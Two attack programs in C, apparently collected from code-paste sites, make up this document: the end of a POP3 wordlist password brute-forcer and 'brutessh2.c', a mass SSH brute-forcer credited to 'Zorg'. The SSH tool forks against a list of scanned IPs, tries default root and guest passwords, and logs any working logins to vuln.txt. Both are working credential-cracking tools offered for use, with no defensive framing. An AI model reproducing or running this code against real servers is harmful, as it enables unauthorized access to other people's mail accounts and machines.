        WSADATA wsaData;
    #endif
        FILE *file = NULL;      /* the wordlist is opened only after USER is accepted;
                                   the posted copy fclose()'d it in error paths before that */
        register char *ptr;
        int port = PORT;
        char *user, *host;
        struct hostent *he;
        SOCKET sockfd;
        SOCKADDR_IN srcin, dstin;
    #ifndef NOBENCHMARK
        struct tm *tm;
        char timebuf[16];
        time_t time1, time2;
        clock_t cracktime;
        clock_t beginpass, passtime;
        clock_t idlestart, idletime;
        clock_t starttime, endtime, finaltime;
    #endif
        char success = 0;
        char buf[BUFSIZE], pass[PASSLEN];

        /* ------------------------------------------------------ */
        if ((argc <= 3) || (argc > 5)) {
            fprintf(stderr, "Usage: %s <wordlist> <user> <host> [port]\n", argv[0]);
            exit(1);
        }
        user = argv[2], host = argv[3];
        if (argc == 5)
            port = atoi(argv[4]);

    #ifdef WINDOWS
        if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0) {
            fprintf(stderr, "Error with WSAStartup(). "
                            "Do you have WinSock installed?\n");
            exit(-1);
        }
    #endif

        sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        memset(&srcin, 0, sizeof(SOCKADDR_IN));
        memset(&dstin, 0, sizeof(SOCKADDR_IN));

        if (inet_addr(argv[3]) != INADDR_NONE)
            dstin.sin_addr.s_addr = inet_addr(argv[3]);
        else {
            he = gethostbyname(host);
            if (!he) {
                fprintf(stderr, "Error with gethostbyname(%s): %s\n",
                        argv[3], strerror(h_errno));
                closesocket(sockfd), exit(-1);
            } else
                dstin.sin_addr = *((struct in_addr *)(he->h_addr));
        }

        srcin.sin_family = AF_INET;
        srcin.sin_addr.s_addr = INADDR_ANY;
        if (bind(sockfd, (SOCKADDR *)&srcin, sizeof(SOCKADDR)) == SOCKET_ERROR) {
            fprintf(stderr, "error with bind(): %s\n", strerror(errno));
            closesocket(sockfd); WSACleanup(); exit(-1);
        }

        dstin.sin_family = AF_INET;
        dstin.sin_port = htons(port);
        printf("Now connecting to %s[%d]... ", inet_ntoa(dstin.sin_addr), port);
        fflush(stdout);
        if (connect(sockfd, (SOCKADDR *)&dstin, sizeof(SOCKADDR)) == SOCKET_ERROR) {
            /* dstin.sin_addr is set on both paths; `he` is only valid when a name was resolved */
            fprintf(stderr, "\nError connecting to %s[%d]: %s\n",
                    inet_ntoa(dstin.sin_addr), port, strerror(errno));
            closesocket(sockfd); WSACleanup(); exit(-1);
        }
        printf("connected.\n");

        memset(buf, 0, sizeof(buf));
        /* Grab POP welcome message */
        if (recv(sockfd, buf, sizeof(buf) - 1, 0) == SOCKET_ERROR) {
            fprintf(stderr, "Error with recv(): %s\n", strerror(errno));
            closesocket(sockfd); WSACleanup(); exit(-1);
        }
        printf("%s\n\n", buf);

        /* -------------------------------------------------- */
    #ifndef NOBENCHMARK
        starttime = clock();
    #endif
        sprintf(buf, "USER %s\n", user);
    #ifdef DEBUG
        printf("Sending: %s", buf);
    #endif
        if (send(sockfd, buf, strlen(buf), 0) == SOCKET_ERROR) {
            fprintf(stderr, "Error send()'ing username: %s\n", strerror(errno));
            closesocket(sockfd); WSACleanup(); exit(-1);
        }

        /* Check result of USER */
        while (1) {
    #ifndef NOBENCHMARK
            idletime = 0, idlestart = clock();
    #endif
            if (recv(sockfd, buf, sizeof(buf)-1, 0) == SOCKET_ERROR) {
                fprintf(stderr, "Error recv()'ing USER response: %s\n", strerror(errno));
                closesocket(sockfd); WSACleanup(); exit(-1);
            }
    #ifndef NOBENCHMARK
            idletime += clock() - idlestart;
    #endif
            ptr = strchr(buf, '+');
            if (ptr) break;
            else {
                ptr = strchr(buf, '-');
                if (ptr) break;
            }
        }
    #ifdef DEBUG
        printf("USER response: %s\n", ptr);
    #endif
        if (strncmp(ptr, "-ERR", 4) == 0) {
            fprintf(stderr, "Error with USER: %s\n", ptr);
            closesocket(sockfd); WSACleanup(); exit(-1);
        }

        /* -------------------------------------------------- */
        file = fopen(argv[1], "r");
        if (!file) {
            fprintf(stderr, "Error fopen()'ing %s: %s\n", argv[1], strerror(errno));
            closesocket(sockfd); WSACleanup(); exit(-1);
        }
    #ifndef NOBENCHMARK
        cracktime = clock();
        signal(SIGALRM, calckeys), alarm(60);
        time1 = time(NULL);
    #endif

        while (1) {
            if (!fgets(pass, sizeof(pass)-1, file)) {
                if (feof(file)) break;
                fprintf(stderr, "Error with fget()'ing wordlist: %s\n", strerror(errno));
                fclose(file); closesocket(sockfd); WSACleanup(); exit(-1);
            }
            ptr = strchr(pass, '\n');
            if (ptr) *ptr = '\0';

            /* -------------------------------------------------- */
    #ifndef NOBENCHMARK
            beginpass = clock();
    #endif
            sprintf(buf, "PASS %s\n", pass);
    #ifdef DEBUG
            printf("Sending: %s", buf);
    #endif
            if (send(sockfd, buf, strlen(buf), 0) == SOCKET_ERROR) {
                sprintf(buf, "Error send()'ing password: %s\n", strerror(errno));
                fputc('\n', stderr), fputs(buf, stderr), fclose(file);
                file = fopen(ERRORLOG, "a");
                if (file) {
                    fputs(buf, file);
                    fprintf(file, "'%s' was not completed "
                                  "(finished %.0f passwords).\n\n", argv[1], numkeys);
                    fclose(file);
                } else
                    fprintf(stderr, "Error fopen()'ing %s: %s\n", ERRORLOG, strerror(errno));
                closesocket(sockfd); WSACleanup(); exit(-1);
            }
    #ifndef NOBENCHMARK
            passtime = 0;
    #endif
            /* Check result of PASS */
            while (1) {
    #ifndef NOBENCHMARK
                idlestart = clock();
    #endif
                if (recv(sockfd, buf, sizeof(buf)-1, 0) == SOCKET_ERROR) {
                    sprintf(buf, "Error recv()'ing PASS response: %s\n", strerror(errno));
                    fputc('\n', stderr), fputs(buf, stderr), fclose(file);
                    file = fopen(ERRORLOG, "a");
                    if (file) {
                        fputs(buf, file);
                        fprintf(file, "'%s' was not completed "
                                      "(finished %.0f passwords).\n\n", argv[1], numkeys);
                        fclose(file);
                    } else
                        fprintf(stderr, "Error fopen()'ing %s: %s\n", ERRORLOG, strerror(errno));
                    closesocket(sockfd); WSACleanup(); exit(-1);
                }
    #ifndef NOBENCHMARK
                idletime += clock() - idlestart;
    #endif
                ptr = strchr(buf, '+');
                if (ptr) break;
                else {
                    ptr = strchr(buf, '-');
                    if (ptr) break;
                }
            }
            numkeys++;
    #ifndef NOBENCHMARK
            if (!passtime) passtime = clock() - beginpass;
    #endif
    #ifdef DEBUG
            printf("PASS response: %s\n", ptr);
    #endif
    #ifndef NOBENCHMARK
            time2 = time(NULL), time2 -= time1, tm = gmtime(&time2);
            strftime(timebuf, 15, "%H:%M:%S", tm);
            printf("[Time running: %s, Clock ticks: %ld, Password: %.0f]\r",
                   timebuf, (long)(clock() - starttime), numkeys);
            fflush(stdout);
    #endif
            if (strncmp(ptr, "+OK", 3) == 0) {
                success = 1;
                break;
            }
        }

    #ifndef NOBENCHMARK
        alarm(0), endtime = clock();
        finaltime = endtime - starttime, cracktime = endtime - cracktime;
    #endif
        fclose(file); closesocket(sockfd); WSACleanup();

        printf("\nCompleted %.0f passwords with %d socket(s).\a\n\n", numkeys, NUMSOCKS);
    #ifndef NOBENCHMARK
        printf("Total clock ticks: %ld.\n", (long)finaltime);
        if (minkeys)
            printf("Tried around %.0f passwords a minute.\n", minkeys);
        else
            printf("Tried %.0f passwords in less than a minute.\n", numkeys);
        printf("Took around %ld clock ticks per password.\n", (long)passtime);
        printf("Spent a total of %ld clock ticks idling in recv().\n", (long)idletime);
        printf("Took %ld clock ticks for the main cracking loop.\n\n", (long)cracktime);
        printf("These results may be off, due to this benchmark\n");
    #endif

        if (success) {
            printf("PASSWORD OF '%s' IS '%s'!\a\n", user, pass);
            file = fopen(SUCCESSLOG, "a");
            if (file) {
                sprintf(buf, "PASSWORD OF '%s' IS '%s'\n", user, pass);
                fputs(buf, file), fclose(file);
            } else
                fprintf(stderr, "Error fopen()'ing %s: %s\n", SUCCESSLOG, strerror(errno));
        }
        file = fopen(COMPLETELOG, "a");
        if (file) {
            fprintf(file, "'%s' completed, %s's password was%sfound.\n",
                    argv[1], user, (success ? " " : " not "));
            fclose(file);
        } else
            fprintf(stderr, "Error fopen()'ing %s: %s\n", COMPLETELOG, strerror(errno));
        if (!success)
            printf("%s's password was not in '%s'\n", user, argv[1]);
        return 0;
    }
  23. [C] rstforums.com - brutessh2.c - Pastebin.com /* *the first brutessh was only for guest & test logins *brutessh2 is a brute for sshd port which attempts to login as root with more than 2000 passwords. *users guest , test , nobody and admin with no passwords are included. *feel free to add more passwords and more users *by Zorg *For mass use a synscan : *Eg: ./biggssh sship.txt * Ok.Try This : Hostname root:12345 */ #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #include <termios.h> #include <sys/select.h> #include <sys/time.h> #include <signal.h> #include <errno.h> #include <libssh/libssh.h> #include <libssh/sftp.h> #include <arpa/inet.h> #include <stdio.h> #include <netdb.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <time.h> #include <stdlib.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/wait.h> #include <netinet/in.h> int flag; int where; int shell(SSH_SESSION *session){ struct timeval tv; int err; char cmd[]="uname -r -s\n"; char rd[2048]; BUFFER *readbuf=buffer_new(); time_t start,acum; CHANNEL *channel; channel = open_session_channel(session,1000,1000); if(isatty(0)) err=channel_request_pty(channel); // printf("channel request pty > %d\n",err); err= channel_request_shell(channel); // printf("channel request shell > %d\n",err); start=time(0); while (channel->open!=0) { usleep(500000); err=channel_poll(channel,0); if(err>0) { err=channel_read(channel,readbuf,0,0); } else { if(start+5<time(0)) { //printf("5 secs passed\n"); return 1; } } } return 0; } void checkauth(char *user,char *password,char *host) { char warn[125]=""; SSH_SESSION *session; SSH_OPTIONS *options; int argc=1; char *argv[]={"none"}; FILE *fp; if(where%20==0) { fp=fopen("log.bigsshf","a"); fprintf(fp,"tring ssh %s@%s %s\n",user,host,password); fclose(fp); } where++; alarm(10); options=ssh_getopt(&argc,argv); options_set_username(options,user); options_set_host(options,host); session=ssh_connect(options); 
if(!session) return ; if(ssh_userauth_password(session,NULL,password) != AUTH_SUCCESS) { ssh_disconnect(session); return; } if(shell(session)) { if(flag) strcpy(warn,"DUP "); fp=fopen("vuln.txt","a+"); fprintf(fp,"%s%s:%s:%s\n",warn,user,password,host); printf("%sOk.TRY This : %s:%s:%s\n",warn,user,password,host); flag=1; } else printf("nologin -> %s:%s:%s\n",user,password,host); } int main(int argc, char **argv) { FILE *fp; char *c; char buff[1024]; int numforks; int maxf; if(argc!=2) { printf("./bigssh <sship.txt>\n"); printf("by Zorg\n"); exit(0); } unlink("log.bigsshf"); fp=fopen("sship.log","r"); if(fp==NULL) exit(printf("nu pot deschide sship.txt\n")); maxf=atoi(argv[1]); while(fgets(buff,sizeof(buff),fp)) { c=strchr(buff,'\n'); if(c!=NULL) *c='\0'; if (!(fork())) { //child where=0; checkauth("test","test",buff); checkauth("guest","guest",buff); checkauth("admin","admins",buff); checkauth("admin","admin",buff); checkauth("user","user",buff); checkauth("root","password",buff); checkauth("root","root",buff); checkauth("root","123456",buff); checkauth("test","123456",buff); checkauth("test","12345",buff); checkauth("test","1234",buff); checkauth("test","123",buff); checkauth("root","!@#$%",buff); checkauth("root","!@#$%^",buff); checkauth("root","!@#$%^&",buff); checkauth("root","!@#$%^&*",buff); checkauth("root","*",buff); checkauth("root","000000",buff); checkauth("root","00000000",buff); exit(0); } else { //parent numforks++; if (numforks > maxf) for (numforks; numforks > maxf; numforks--) wait(NULL); } } }